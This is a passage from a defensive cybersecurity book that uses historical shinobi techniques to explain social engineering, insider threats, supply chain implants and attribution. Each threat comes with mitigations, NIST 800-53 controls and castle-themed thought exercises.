Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129

17

FIRE ATTACK 131

First, it is easy to set fires; second, it is not easy for the enemy to put out

the fire; and third, if your allies are coming to attack the castle at the

same time, the enemy will lose any advantage as the fortifications will be

understaffed.

Destructive Cyber Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133

Safeguards from (Cyber) Fire Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 137

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138

18

COVERT COMMUNICATION 139

When a shinobi is going to communicate with the general after he has gotten

into the enemy’s castle, the shinobi needs to let his allies know where he is. It

is essential to arrange for the time and place to do this.

Command and Control Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . 141

Controlling Coms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 144

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146

19

CALL SIGNS 147

When you steal in, the first thing you should do is mark the route, showing

allies the exit and how to escape.

Operator Tradecraft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148

Detecting the Presence of Call Signs

,

join in a counteroffensive, and break the siege. To

complete the ruse, the shinobi commander would send a small force to

masquerade as allied reinforcements, both luring the target from their

encampment and allowing shinobi to infiltrate while the gates were open.

According to the scroll, after shinobi successfully infiltrated the tar-

get using suigetsu no jutsu, they had to keep these thoughts in mind:

• Remain calm. Do not appear lost.

• Mimic the people in the castle.

• Prioritize collecting code words, passwords, challenge responses,

and insignias.

• Signal to allies as soon as possible.4

In this chapter, we will explore the ways this ancient technique could

be deployed by a cyber threat actor and compare it to commonly used

social engineering tactics. We’ll introduce a way to think abstractly about

network communication signals as entering and/or leaving perimeters—

despite the computer system’s not physically moving—and detail concepts

for countering the moon on the water technique and social engineering

attacks in general. Lastly, we’ll attempt a thought exercise scenario that

mimics the conundrum ancient Japanese generals must have faced when

targeted by moon on the water.

Social Engineering

The shinobi moon on the water attack bears a striking similarity to today’s

social engineering attacks, which exploit a human target’s decision-making

processes and cognitive biases to manipulate them into revealing sensitive

information or performing self-defeating actions. In cybersecurity, most

Moon on the Water93

social engineering tactics are used by adversaries operating inside enemy

territory to exploit the target’s trust. Examples of typical social engineer-

ing attacks include:

Phishing The adversary sends an email that convinces its recipients

to open a dangerous document or visit a malicious hyperlink, result-

ing in malware infection, ransomware execution, data theft, or other

attacks.

Pretexting The adversary calls or emails with invented scenarios

designed to convince a target to reveal sensitive information or per-

form malicious actions.

Baiting The adversary strategically plants malicious portable

media, such as a USB drive, in a physical location to entice the target

to pick it up and connect it to internal systems, creating an opening

for system compromise.

Social engineering is a particularly challenging security problem

because it exploits human nature in ways that technological controls can-

not always defend against. As targets and victims become more aware of

social engineering threats, many organizations lean on focused technical

controls, security protocols, and user education to protect their valuable

assets. Employees are trained in how to properly handle and care for

sensitive information and systems, while security teams document proce-

dures to verify the identity of unknown or unsolicited visitors and require

physical escorts for non-employees on company grounds. Red teams

conduct internal phishing and tailgating tests, among other exercises, to

gauge employee awareness of and instill resistance to social engineering

tactics. Administrators implement technical controls to block malicious

documents and hyperlinks, employ data loss prevention (DLP) software,

prevent unauthorized system changes, blacklist unregistered systems and

external media, and use caller ID.

While these are all good and necessary security measures, the way peo-

ple work has changed. And thinking around social engineering attacks has

not yet evolved to fully consider defending against moon on the water–style

attacks—the kind that attempt to lure the target outside its own defenses.

Today, things like bring your own device (BYOD) policies, full-time

remote work, and multitenant clouds make workers and organizations

more flexible. However, they also weaken traditionally strong perimeter

security architectures and expose employees to new social engineering

threats. For example, in most cases, stateful firewall rules do not permit

external (internet) communication to pass through the firewall to an

internal host. Instead, the firewall requires the internal (intranet) system

94Chapter 12

to initiate contact before it allows responses from the external system to

pass through to the internal host. So, while the internal host does not

physically leave the organization’s defenses, doing so virtually—say, by

visiting a malicious website—could allow threat actors to infiltrate within

the responding communications. Essentially, this is digital tailgating.

In addition to directly compromising traditional security architectures,

threat actors could use a number of moon on the water–style techniques to

infiltrate heavily fortified organizations. Consider the following scenarios:

• An adversary triggers a fire alarm within a secure facility, causing

employees to exit en masse. While firefighters clear the building,

the adversary blends into the crowd of employees to steal or docu-

ment badges, keys, tokens, faces, fingerprints, and more. To ease

the flow of employees returning to work, the facility temporarily

turns off badge readers, turnstiles, or other physical access con-

trols, or security is so overwhelmed by the flood of people that

they don’t notice tailgating.

• An adversary uses a food truck to lure employees from a secure

facility. Then they leverage their own status as a non-initiator to

perform quid pro quo social engineering on a target, eventually

developing a rapport and convincing the target to perform actions

they would not in a traditional social engineering scenario.

• An adversary compromises the Wi-Fi network at a café across the

street from a business conference to steal the credentials of a

target organization’s employees. By entering the café with their

devices, those employees have left their organization’s defenses

and unknowingly exposed themselves to an environment con-

trolled by the adversary.

• An adversary conducts large-scale disruptive, denial, or destruc-

tive attacks against targeted people, systems, and data, prompt-

ing them to move to a less secure disaster recovery operation

site that is easier to infiltrate than the organization’s permanent

headquarters.

Note that while these attacks might not necessarily achieve an adver-

sary’s end goal, they could provide means or information that, in con-

junction with other exploits, accomplishes malicious objectives.

Defenses Against Social Engineering

Most organizations perform social engineering awareness training

and routinely phish test internal staff. While this strategy improves

resiliency to such attacks, a significant percentage of personnel always

fail. Unfortunately, most organizations leave staff vulnerable to social

Moon on the Water95

engineering. We need to do more to give employees the tools they need

to guard against such deceptions.

1. Establish safeguards. Implement standard trust frameworks for

employees to reduce the risk of compromise by social engineer-

ing. Identify high-value targets in your environment, and then

establish security protocols, policies, and procedures for the

appropriate control and handling of sensitive information on

those systems (expand these to all systems over time). Conduct

training, awareness, and test exercises within your organization to

raise the level of employee awareness around social engineering,

along with iterative threat modeling to review and improve related

security controls.

2. Implement “slow thinking.” Distribute and discuss Daniel Kahneman’s

book Thinking, Fast and Slow5 with your security team. The book

describes two systems of thought: the quicker, more impulsive

“System 1” and the slower, more logical “System 2.” Develop solu-

tions that force your employees to slow down and think in System

2 terms, thereby avoiding the cognitive biases and shortcuts social

engineers most often exploit. Possible examples include:

• Configuring

,

your phone-switching system to require an

employee who receives an external call to punch in the even

digits of the caller’s phone number before the system can

connect.

• Configuring your mail client so that employees must type the

“from” email address backward before they can open exter-

nal email attachments.

• Requiring users visiting non-whitelisted URLs to correctly

enter the number of characters in the domain before the

browser performs a DNS query.

All these measures will slow down business operations, but

they also help mitigate social engineering attacks.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . Your castle has been besieged, and you aren’t sure

(continued)

96Chapter 12

whether you have enough food to keep your people fed . You receive a letter

from an allied general who says he will send you food and other provisions if

you can divert the attention of the enemy troops surrounding your castle at a

specific date and time . The letter asks that you send your second-in-command

to the allied general’s camp nearby to help plan a counteroffensive against

the siege .

How do you determine whether the letter is a ruse sent by the enemy?

Can you independently verify the letter’s authenticity? Assuming the letter is

legitimate, how would you lure away the attacking army? Finally, what pre-

cautions would you take to receive the supplies while preventing infiltration of

your own castle during the exchange?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of moon on the water in mind.

1. Because security systems and controls can protect information

only within established boundaries, implement safeguards that

stop information and systems from passing beyond those bound-

aries and falling into the hands of social engineers. [AC-3: Access

Enforcement | (9) Controlled Release; PE-3: Physical Access

Control | (2) Facility/Information System Boundaries; SC-7:

Boundary Protection]

2. Control your information flow so that even when data goes

beyond the normal protective boundaries, it is not allowed to

travel to or between unauthorized information systems. [AC-

4: Information Flow Enforcement; PL-8: Information Security

Architecture; SC-8: Transmission Confidentiality and Integrity]

3. For all non-local (that is, through a network) system mainte-

nance, establish approval protocols, require strong authenticators

and documented policies, and implement monitoring. [MA-4:

Nonlocal Maintenance]

4. Establish protections for data outside controlled areas and

restrict data-handling activities to authorized persons. [MP-5:

Media Transport | (1) Protection Outside Controlled Areas]

Moon on the Water97

Debrief

In this chapter, we described the advanced shinobi technique of moon

on the water. We looked at various scenarios in which the moon on the

water technique could be modernized to target businesses. We explored

the challenges that social engineering presents and the various forms

it can take. We reviewed existing security practices designed to handle

social engineering and examined new defense concepts. And we lifted

a thought exercise from the shinobi scrolls to demonstrate how fragile

our trust model is and how hard it can be to safeguard against social

engineering.

In the next chapter, we will discuss insider threats—one of the

most fascinating topics in security. The shinobi scrolls provide detailed

instructions on how to identify people who could be recruited as insiders

with the help of some social engineering techniques—and they suggest

a way to defend against insider threats that is contrary to modern best

practices.

13

W O R M A G E N T

Make a minomushi, or worm agent

(aka insider threat), out of an enemy.

A minomushi is someone who serves the enemy but is made a

ninja working for your side. Thus the agent is exactly like a worm

in the enemy’s stomach, which eats its belly from the inside out.

—Bansenshūkai, Yo-nin I 1

Never short on evocative imagery, Bansenshūkai describes

an open-disguise infiltration technique called “the art

of a worm in your stomach” (or “worm agent”), which

calls for shinobi to recruit enemy insiders to perform

tasks on their behalf. Such recruitment took high emo-

tional intelligence. Shinobi had to choose an appropriate

target; engineer opportunities to approach the target;

and discreetly parse what the target thought about their

employer, personal worth, and secret ambitions.2 The

scroll warns that candidate selection must be undertaken

100Chapter 13

with extreme care, because attempting to recruit the wrong person to

become a worm agent—or minomushi—could seriously harm a shinobi’s

mission. To maximize their odds of successful recruitment, shinobi devel-

oped eight archetypes of likely worm agents:3

• Individuals who have been unfairly or excessively punished by

their current employer for prior offenses and who harbor deep-

seated bitterness as a result.

• People who, despite being born to privilege or having impressive

abilities, are employed beneath their station, have been passed

over for promotion, and resent being underutilized.

• Habitual overachievers who consistently deliver good results for

their employers but are rewarded with token titles, small bonuses,

or insufficient raises—or with nothing at all. Their contributions

minimized, they believe they might have had a more fruitful

career had they been hired by another employer. They further

believe their organization makes stupid decisions because leader-

ship values sycophants and politicians over loyal employees with

real accomplishments.

• Smart and talented workers who do not get along with leadership.

Because these people tend to garner disapproval easily and are

considered annoyances, their employers give them low-level posi-

tions, lay the groundwork for constructive dismissal, and generally

make them feel unwelcome.

• Experts in their field whose employers exploit their circum-

stances, such as loyalty oaths or family obligations, to keep them

in lower positions.

• Individuals whose job functions are in direct opposition to their

personal identity, family needs, or beliefs, leading them to regret

the work they do.

• Greedy and conniving people who lack loyalty or a moral

compass.

• “Black sheep” employees who have a bad reputation due to past

misdeeds and feel frustrated about their diminished status.

After a shinobi selected a potential minomushi, they created a plan

to become acquainted and build a relationship with the candidate.

Bansenshūkai instructs shinobi to present themselves as rich and curry

the target’s favor with money; use friendly banter to discern their likes,

beliefs, and sense of humor; and use light banter to surreptitiously dis-

cover their inner thoughts. If the target’s character aligned with a worm

agent archetype, then the shinobi attempted to exploit those minomushi

Worm Agent101

traits by promising wealth, recognition, and help with achieving their

secret ambitions—or, more directly, alcohol and sex—in exchange for

betraying their employer.4

Before exploiting the newly turned minomushi, shinobi were advised

to obtain an oath of betrayal, collect collateral assets to guarantee

the worm agent’s loyalty, and establish signals and other operational

security(OPSEC).5

In this chapter, we will review insider threats. We will compare and

contrast the disgruntled worker with the recruited insider threat. We will

also touch on the detection and deterrent methods that organizations

useto deal with insider threats, as well as a new, tailored approach—

inspired by the shinobi scrolls—to proactively prevent at-risk employees

from becoming insider threats. Lastly, a thought exercise will

,

ask you to

imagine which former and/or current employees could become insider

threats and to examine how you have interacted with them.

Insider Threats

An insider threat is an employee, user, or other internal resource whose

actions could harm an organization—whether intentionally or not.

Because they did not intend to perform malicious actions, a hapless

employee who opens a phishing email and infects their workstation with

malware is an unwitting insider threat. On the other hand, a disgruntled

worker who purposefully releases a virus into the organization, whether

for personal reasons or on behalf of an adversary, is an intentional insider

threat. Because insider threats are legitimate, authorized users with

authentication, privileges, and access to information systems and data,

they are some of cybersecurity’s most difficult problems to mitigate.

Many organizations rely on technical controls and threat hunters

for early detection of insider threats. Technical detection techniques—

things like behavior heuristics—can help identify potential insider

threats. Vigilant cyberdefenders and hunters may investigate users who

take uncharacteristic or inappropriate actions, including downloading

all files to external portable media, performing searches for sensitive or

proprietary data unrelated to their job, logging in to perform nonprior-

ity work on weekends or holidays, accessing honeypot systems and files

clearly labeled as restricted access, or downloading and using hacker-like

tools to perform actions outside their job functions.

But technical controls are only part of a solid defense strategy,

even for mature organizations. By checking references; performing

background checks, including of criminal and financial history; and

102Chapter 13

screening for drug use, the employer can verify that employees are not

plainly vulnerable to undue influence. The human resources function

plays a key role in identifying potential insider threats. Some human

resources departments conduct annual employee surveys to identify

potential issues, and others terminate at-risk employees proactively or

recommend rescinding certain access privileges based on troublesome

findings. Unfortunately, it is common for organizations to exercise mini-

mal precautions. Most trust their employees, others ignore the issue, and

still others accept the risk of insider threats so business operations can

run smoothly.

Entities that fight insider threats more aggressively, such as organiza-

tions in the defense industry and the intelligence community, implement

advanced detection and prevention measures such as polygraphs, routine

clearance checks, counterintelligence programs, compartmentalization,

and severe legal penalties—not to mention cutting-edge technical con-

trols. However, even these controls cannot guarantee that the malicious

actions of all insider threats—especially those assisted by sophisticated

adversaries—will be detected and prevented. They also present unique

implementation and operational challenges.

A New Approach to Insider Threats

Organizations that focus their efforts on scrutinizing employees and

attempting to catch them in the act are waiting too long to address the

threat. A more proactive approach is to foster a work environment that

doesn’t create the conditions in which insider threats thrive. Some of the

following suggestions are tailored to remediating specific insider threat

archetypes.

1. Develop detection and mitigation techniques. Examine the products and

technical controls your organization uses to identify and mitigate

internal threats. Run staff training and awareness sessions, review

security incident reports, and perform red team exercises such

as phishing tests to identify repeat unintentional insider threats.

Then train, warn, and mitigate these individuals by implementing

additional security controls on their accounts, systems, privileges,

and access. For example, your security team could restrict staff

members’ ability and opportunity to perform insider threat actions

with strict controls and policies. Some examples include:

• Enforce a policy that macros cannot be enabled or executed

on systems.

Worm Agent103

• Configure all emails to arrive in plaintext with hyperlinks

disabled.

• Quarantine all external email attachments by default.

• Disable web browsing, or make it available only through an

isolated internet system that is not connected to your organi-

zation’s intranet.

• Disable USB ports and external media drives on certain

systems.

Monitoring intentional insider threats requires both advanced

detection techniques and technologies capable of deception and

secrecy. Select these based on appropriate organizational threat

modeling and risk assessments.

2. Implement human resource–based anti-minomushi policies. After the

previous technical controls and detection techniques have been

implemented and tested, address personnel controls. Ensure

that human resources maintains records on current employees,

previous employees, and candidates that include indicators of

minomushi profiles. Ask pointed questions during candidate

screening, performance reviews, and exit interviews to capture

these diagnostics.

3. Take special care to prevent the circ*mstances that create minomushi

employees. Your human resources team should consider the fol-

lowing organization-wide policies, presented in order of the

eight minomushi archetypes:

• Review employee disciplinary protocols to prevent unfair

or excessive punishment—real or perceived—of employees.

Require that employees and applicants disclose whether they

have family members who have worked for your organization.

Encourage human resources to gauge whether employees

think the disciplinary actions against them are unfair or

excessive, and then work together to find solutions that will

mitigate employee animosity.

• Regularly distribute employee surveys to gauge morale and

identify underutilized talent in lower-ranking employees.

Conduct transparent interviews with employees and man-

agement to determine whether: an employee is ready for a

promotion, has gone unrecognized for recent achievements,

or needs to grow a specific skill set; the company has a role to

promote them into or budget to offer them a raise; or certain

104Chapter 13

employees perceive themselves to be better or more valuable

than their colleagues—and whether a reality check is neces-

sary. Working with management, consider how to alleviate

employee bitterness and how to correct perceptions that the

organization is not a meritocracy.

• As part of performance reviews, solicit feedback from col-

leagues to identify managers whom lower-ranking employees

consider most valuable, as well as which employees believe

they have not received appropriate recognition. Address

these grievances with rewards and/or visibility into the com-

pany’s leadership decisions.

• Encourage leadership to personally coach smart but socially

awkward workers, discretely letting them know how they are

perceived, with the goal of helping these employees feel more

socially accepted and less isolated.

• Review and eliminate company policies that hold back top

talent. These may include noncompete agreements, unfair

appropriation of employees’ intellectual property, and insuf-

ficient performance bonuses or retention incentives. While

designed to protect the company, these policies may have the

opposite effect.

• Conduct open source profiling of current employees and

applicants to determine whether they have publicly expressed

strong feelings about or have a conflict of interest in the mis-

sion of your organization. If so, reassign those employees to

positions where they will feel more alignment between their

personal values and the work they do or ease their departure

from the organization.

• Develop character-profiling techniques to look for indica-

tors that employees

,

and applicants may be susceptible to

bribery. Consider reducing system access and privilege levels

for these employees, thereby reducing their usefulness to an

adversary.

Work closely with employees at high risk for minomushi condi-

tions. Give them extra resources, time, and motivation to move

past whatever grudges they may hold, seize opportunities for

personal growth, and develop self-respect. Minimize or halt orga-

nizational actions that reinforce bad memories or continue to

punish an employee for past misdeeds.

Worm Agent105

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable information, treasure, and people inside . You receive credible threat

intelligence that a shinobi plans to recruit someone within your castle to use

their trust and access against you . You receive a list of eight different types of

people likely to be recruited . It’s unclear who specifically is being targeted or

what the shinobi’s objectives are .

Whom would you first suspect as an insider threat? Why is that person

in a vulnerable state, and how could you remediate the situation? How would

you detect the recruitment of one of your subjects or catch the recruiter in

the act? How might you place guards to prevent insider threat actions? How

could you train your subjects to report insider threats without causing every-

one to turn on each other? How long should you maintain this insider threat

program?

To avoid the political pitfalls of conducting this as a group exercise at

your current workplace, consider building and using a list of former employ-

ees . If you can perform this exercise discretely with a small group of stake-

holders, consider both former and current employees .

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of recruited insider threats in mind. (For more information,

see PM-12: Insider Threat Program.)

1. Have the SOC work privately with human resources to correlate

information on potential insider threats who display minomushi

characteristics. The SOC should more closely monitor, audit,

and restrict these high-risk individuals. It can also work with

human resources to establish insider threat honeypots—for

example, files in network shares that say “RESTRICTED DO

NOT OPEN”—that identify employees who perform actions con-

sistent with insider threats. [AC-2: Account Management | (13)

Disable Accounts for High-Risk Individuals; AU-6: Audit Review,

Analysis, and Reporting | (9) Correlation with Information from

Nontechnical Sources; SC-26: Honeypots]

2. Use your own account to perform insider threat actions (without

red team capabilities) on files and systems you know will not harm

106Chapter 13

your organization. Actions could include modifying or delet-

ing data, inserting fake data, or stealing data. Document which

systems and data your account can access, then use a privileged

account such as admin or root to conduct malicious privileged

actions. For example, you could create a new admin user with

an employee name that does not exist. Ask whether your SOC

can discover what data you stole, deleted, or modified within a

specific date range to test whether your SOC can properly audit

the privileged actions you performed. [AC-6: Leave Privilege | (9)

AuditingUse of Privileged Functions; CA-2: Security Assessments |

(2) Specialized Assessments]

3. Train your employees to recognize minomushi characteristics

andinsider threat behavior. Enable employees to easily and

anonymously report potential minomushi conditions with respect

to suspected insider threats, similar to how they report phish-

ing scams. Conduct insider threat awareness exercises as part of

regular security training. [AT-2: Security Awareness | (2) Insider

Threat]

Debrief

In this chapter, we reviewed the shinobi technique of recruiting vulner-

able people inside a target organization to perform malicious actions.

We detailed the eight insider threat candidate archetypes and discussed

the various types of insider threat detection and protection programs

currently used by organizations. We described a new defensive approach

based on information from the shinobi scrolls—one that uses empathy

toward the disgruntled employee. The thought exercise in this chapter

challenges participants to evaluate not only potential insiders but also

their own actions toward coworkers; it encourages them to think about

taking a more cooperative approach to potential insider threats.

In the next chapter, we will discuss long-term insiders: employees

recruited by an adversary before they joined your organization. And,

since long-term insiders intentionally hide any resentment or malice

toward the organization, detecting them is even more problematic.

14

G H O S T O N T H E M O O N

According to Japanese legend, if you knew how to seek the

ghost who tends trees on the moon, he could invite you to the

moon to eat the leaves of his tree, making you invisible.

In normal times, before the need arises, you should find someone

as an undercover agent who will become the betrayer, an enemy

you plant and thus make a ninja of him and have him within

the enemy castle, camp or vassalage, exactly as the ghost in the

legend, Katsuraotoko, is stationed on the moon.

—Bansenshūkai, Yo-nin I 1

As part of its array of sophisticated infiltration techniques,

the Bansenshūkai describes a long-term open-disguise tac-

tic called “ghost on the moon.” This tactic was designed

to acquire privileged information and access through a

planted secret agent. First, a shinobi recruits a person who

is trustworthy, smart, wise, courageous, and loyal. Or, if

the recruit is not loyal to begin with, the scroll suggests

taking their family members hostage for the duration of

108Chapter 14

the mission to make them “loyal.” Then, the shinobi plants the agent in a

foreign province or castle. There, they will spend years working earnestly

with the target to build up their reputation, connections, knowledge, and

access. Ideally, the plant will be working closely with enemy leadership.

The mole must always maintain plausible, reliable, and conspicuous means

of contact with the shinobi. If this enemy stronghold ever becomes a target

for attack, the shinobi handler can call on the undercover agent for high-

confidence intelligence, insider assistance, sabotage, and offensive actions

against the enemy, including assassination.2 And while the ghost on the

moon gambit took years to pay off, to patient and tactful shinobi, the

reward was worth the time investment.

In this chapter, we will look at the ghost on the moon as a type

of insider threat. It can help to think of hardware implants, by way of

analogy, as trying to find ghosts on the moon with a telescope. For that

reason, we’ll cover the subject of implants, supply chain security, and

covert hardware backdoors. We will also compare the characteristics of

a ghost on the moon plant with ideal hardware implants. We’ll touch on

supply chain risk management and threat-hunting strategies, with the

caveat that underlying issues make this threat nearly impossible to fully

defendagainst.

Implants

Corporate espionage and nation-state spy activities historically have

relied on strategically placed agents to accomplish specific long-term

missions. Today, technology offers newer and cheaper ways to get

theresults that have traditionally been possible only with human

actors. For example, suppose your organization bought and installed

aforeign-manufactured router on its network years ago, and it has

functioned perfectly. But, unbeknownst to your security team, an

adversary has just activated a hidden implant installed at the factory,

providing direct, unfiltered backdoor access to your most sensitive sys-

,

tems and data.

The cybersecurity industry classifies this kind of attack as a supply

chain attack. Here, supply chain refers to the products and services asso-

ciated with an organization’s business activities or systems; examples

include hardware, software, and cloud hosting. In the previous example,

the router performs the necessary business activity of moving digital

information over the network to conduct ecommerce.

While heuristics or threat hunting can detect abnormal router behav-

ior, there is no foolproof way to defend against covert implants. Some

organizations may use quality assurance representatives to monitor man-

ufacturing, but they cannot ensure that every system is built correctly.

Ghost on the Moon109

However, several cybersecurity best practices can mitigate a router-based

supply chain attack. A proactive organization could:

1. Perform a threat analysis of all router manufacturers and then

use the results to acquire a router less likely to ship with compro-

mised hardware or software

2. Employ a trusted, secure shipping service and procure chain of

custody for the router to prevent malicious interception

3. Conduct forensic inspection of the router upon delivery to

validate that it has not been compromised or altered from the

expected specifications

4. Secure the router with tamper protections and detection tech-

nologies to identify and mitigate unauthorized alterations

Note that these steps are not limited to routers. Organizations can

take these precautions on every service, device, system, component, and

software application in their supply chain.

Covert implants are as valuable to modern nation-states as they were

to shinobi, because the need to discover and defend against them poses

difficult, long-term organizational challenges. Cybersecurity profession-

als continually test new concepts to address those challenges. For exam-

ple, an organization can restrict trust and access to all systems under the

assumption that they have already been compromised. However, the sig-

nificant impact they have on business operations renders many of these

concepts a practical impossibility.

Protections from Implants

Organizations attempting to weigh or x-ray every system to find some-

thing out of place will likely find themselves lost in the process of try-

ing to manage their supply chain. What’s more, advanced threat actors

capable of supply chain compromises are likely to embed malicious func-

tions in the default design of the system. In this way, only they know the

secret to enabling the implant, and it exists in every system. And while an

organization’s inspection process may be able to see a threat, it might not

understand what it’s looking at. This is the scope of this problem—it’s like

trying to find a ghost on the moon. That said, guidance for protecting

your organization from these implants is as follows:

1. Identify supply chain attack conditions. Create a list of components in

your supply chain that have ghost on the moon potential. Include

elements that:

• Are considered high trust

110Chapter 14

• Can communicate

• Can provide lateral or direct access to sensitive information

or systems

• Are not easily inspected

• Are not regularly replaced or updated

Specifically, look at software and hardware that communicates

with external systems or exerts control over systems that can

perform signal or communication functions (such as firmware

on routers, network interface cards [NICs], and VPN concentra-

tors). An implant can also exist as a hardware device, such as an

extremely thin metal interface placed inside the PCI interface

socket to act as a man-in-the-middle against the NIC, altering the

data flow, integrity, confidentiality, and availability of network

communications for that interface.

Imagine what your antivirus, hypervisor, vulnerability scanner,

or forensic analyst cannot inspect or test in your environment. A

key feature of ghost on the moon supply chain candidates is their

ability to persist in the target’s environment, which likely requires

targeting components that do not break or wear down regularly,

are not easily replaced or upgraded with cheaper versions over

time, are too important to turn off or dispose of, and are dif-

ficult to modify and update (such as firmware, BIOS, UEFI, and

MINIX). Autonomy and stealth requirements for this class of sup-

ply chain implant mean the implant needs to avoid inspection,

scans, and other types of integrity testing while having access to

some form of processor instruction or execution.

2. Implement supply chain protections. Implement supply chain safe-

guards and protections as needed. A ghost on the moon supply

chain attack is one of the most challenging to detect, prevent, or

mitigate. Thus, many organizations simply accept or ignore this

risk. It can be useful to start with first principles—fundamental

truths about security and the purpose of your business—and

then use these truths as a rubric to evaluate the threat your

organization faces. Review “A Contemporary Look at Saltzer and

Schroeder’s 1975 Design Principles”3 or other core security works

to determine appropriate mitigations for this threat. It could

also be helpful to abstract the problems to higher-level concepts,

where they become familiar and understood, and then attempt

to solve them. Consider the following Castle Theory Thought

Exercise.

Ghost on the Moon111

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . You receive credible threat intelligence that a scribe

in your employ is an enemy “ghost on the moon” plant . This agent has spent

the past 10 years learning to copy your handwriting style, vernacular, and

sealing techniques, and they have memorized the names and addresses of

all your important contacts . The plant has the means to modify your outgoing

orders, such as by directing your standing army to travel far from key defense

locations . It is not clear which scribe is the plant or whether the scribe has

already been activated by an enemy shinobi . Scribes are a scarce resource

in your kingdom—acquiring and training them is costly and time intensive—

and they are critical to your operations .

How do you detect which scribe is an enemy plant, both pre- and post-

activation? Consider what safeguards could prevent the scribe from sending

altered orders in your name . What authentication protocols could you imple-

ment to prevent message spoofing? What integrity measures might you take

to prevent message tampering? What nonrepudiation controls would deny

false messages sent in your name? How could you ensure that future scribes

are not compromised enemy plants? Finally, consider all these questions in a

scenario in which multiple scribes are enemy plants .

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of ghost on the moon in mind.

1. Consider introducing heterogeneity into the supply chain by

isolating, segmenting, and layering a diverse set of supply chain

components. Supply chain diversity greatly reduces the potential

impact of a compromised component. [SC-29: Heterogeneity]

2. Analyze your organization’s procurement process to identify

areas in which you can reduce the risk of a supply chain attack.

Use techniques such as blind buying, trusted shipping, restrict-

ing purchases from certain companies or countries, amending

purchasing contract language, and randomizing or minimiz-

ing acquisition time. [SA-12: Supply Chain Protection | (1)

Acquisition Strategies/Tools/Methods]

3. Consider delaying non-security updates or acquisition of new,

untested software, hardware, and services for as long as possible.

112Chapter 14

Implement advanced countermeasures to limit a sophisticated

,

actor’s opportunity to target your organization. [SA-12: Supply

Chain Protection | (5) Limitation of Harm]

4. Purchase or assess multiple instances of the same hardware,

software, component, or service through different vendors to

identify alterations or non-genuine elements. [SA-12: Supply

Chain Protection | (10) Validate as Genuine and Not Altered;

SA-19: Component Authenticity; SI-7: Software, Firmware, and

Information Integrity | (12) Integrity Verification]

5. Install independent, out-of-band monitoring mechanisms and

sanity tests to verify that high-trust components suspected of sup-

ply chain attack are not performing covert communications or

altering data streams. [SI-4: Information System Monitoring | (11)

Analyze Communications Traffic Anomalies | (17) Integrated

Situational Awareness | (18) Analyze Traffic/Covert Exfiltration]

Debrief

In this chapter, we reviewed the shinobi technique of hiring trusted allies

to work inside an organization and position themselves to be as useful

to the shinobi as possible. We compared this type of plant to hardware

implants and discussed the theory behind what devices and systems

would be suitable for hardware implants. We talked about supply chain

attacks, along with ways to potentially detect them. The thought exercise

challenged you to detect a compromised scribe who has privileged access

to communications; the scribe represents a router, VPN, or other layer 3

device meant to be transparent to the communicators, highlighting how

difficult it can be to determine when such a device is compromised.

In the next chapter, we will discuss the shinobi’s backup plan if you

do happen to catch them or their plant. The shinobi would often plant

false evidence ahead of time, long before their covert mission, enabling

them to shift blame if caught. When successful, this tactic tricks the vic-

tim into believing an ally betrayed them, and this deception itself harms

the target.

15

T H E A R T O F T H E F I R E F L I E S

The art of fireflies should be performed only after you know

everything about the enemy in great detail so that you can construct

your deception in accordance with the target’s mindset.

Before you carry out surveillance or a covert shinobi activity,

you should leave a note for your future reputation.

—Yoshimori Hyakushu #54

The Bansenshūkai describes an open-disguise infiltration

technique for shinobi called “the art of fireflies” (hotarubi

no jutsu).1 I like to think that this technique was named

based on how the flash of light from a firefly lingers in your

night vision after the fly has moved, causing you to grasp at

empty space. Shōninki describes the same technique as “the

art of camouflage” (koto wo magirakasu no narai).2 Using this

technique, shinobi plant physical evidence that baits an enemy into taking

some desired action, including misattributing whom the shinobi works for,

making false assumptions about the shinobi’s motives, and reacting rashly

to the attempted attack, exposing themselves to further offensive actions.

114Chapter 15

A forged letter with incriminating details or misleading evidence

about the enemy was the most common hotarubi no jutsu technique, with

several variations. The scrolls describe shinobi sewing a letter into their

collar so that it would be found quickly if they were caught or searched.3

Or, a shinobi might recruit a willing but inept person to be a “ninja,” give

them a letter detailing the exact opposite of the shinobi’s true plans,

and send them on a mission into the adversary’s environment, knowing

that this “doomed agent” would certainly be captured. Importantly, the

recruit themselves would not be aware of this part of the plan. Upon

searching the recruit, guards would find the forged letter, which impli-

cated a high-value target—such as the adversary’s most capable com-

mander—in a treasonous plot. The “ninja” would likely break under

torture and attest to the authenticity of the message, further damning the

target.4 This all served to deceive the enemy into attacking or disposing

of their own allies.

In an even more elaborate variation, prior to the mission, the shinobi

would carefully plant evidence that supported the letter’s false story and

place the forged letter in an incriminating location, such as the quar-

ters of the enemy commander’s trusted adviser. The forged letter then

became a safeguard. If the shinobi were caught, they would withstand tor-

ture until they could determine the enemy’s objectives, and then reveal

their secret knowledge of the letter. The enemy would then find the

letter and the connected evidence. Having built credibility, the shinobi

would then pledge to become a double agent or share secrets about their

employer in exchange for not being executed.5 This technique left the

enemy confused about the shinobi’s motives, concerned about potential

betrayal, and in doubt about who the real adversary was.

In this chapter, we will review the challenges associated with attribut-

ing threats to a specific adversary and/or source. We’ll cover attribution

